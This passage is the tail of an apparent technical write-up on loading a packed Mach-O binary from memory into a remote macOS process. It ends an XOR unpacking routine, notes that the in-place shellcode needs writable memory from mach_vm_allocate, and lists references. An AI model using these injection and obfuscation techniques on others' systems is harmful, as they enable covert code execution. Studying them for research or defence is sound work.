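    xorInPlace(packed.data(), packed.size(), mask);
    return packed;
}
```

Because the shellcode unpacks in place, the memory holding the packed binary has to be writable in the remote process, which is the case for memory obtained from mach_vm_allocate with its default protection.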

References

https://www.cylance.com/en_us/blog/running-executables-on-macos-from-memory.html
https://lowlevelbits.org/parsing-mach-o-files/
https://ho.ax/posts/2012/02/resolving-kernel-symbols/
https://mirror.informatimago.com/next/developer.apple.com/documentation/DeveloperTools/Conceptual/MachORuntime/5rt_api_reference/chapter_11_section_6.html
https://opensource.apple.com/source/dyld/dyld-433.5/